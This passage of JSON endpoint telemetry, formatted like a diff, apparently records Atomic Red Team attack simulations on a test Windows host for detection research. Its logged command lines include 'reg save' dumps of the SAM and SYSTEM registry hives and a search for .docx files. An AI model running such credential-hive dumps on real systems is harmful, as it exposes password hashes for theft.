"REGC0BC.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "file", + "file_name": "REGC0BC.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "file", + "file_name": "security.hive", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\security.hive", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "process", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "process", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\System system.hive\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3020, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571775030000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "command_line": "reg save HKLM\\System system.hive", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2008, + "ppid": 3020, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571775150000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}", + "unique_ppid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883571800270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883571800270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "file", + "file_name": "REGCD01.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571806210000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "file", + "file_name": "REGCD01.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571806210000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "file", + "file_name": "system.hive", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\system.hive", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571807140000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807140000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807140000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "process", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "process", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3544, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571807430000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "command_line": "reg save HKLM\\SAM sam.hive", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2160, + "ppid": 3544, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571807530000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}", + "unique_ppid": "{42FC7E13-CB3C-5C05-0000-001099025101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "file", + "file_name": "REGD250.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "file", + "file_name": "REGD250.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "file", + "file_name": "sam.hive", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\sam.hive", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "process", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "process", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1232, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571820020016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "process", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6036, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571821140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7980, + "ppid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571821220000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "command_line": "findstr /e .docx", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1572, + "ppid": 6036, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "create", + "timestamp": 131883571821260000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "findstr.exe", + "image_path": "C:\\Windows\\System32\\findstr.exe", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1572, + "process_name": "findstr.exe", + 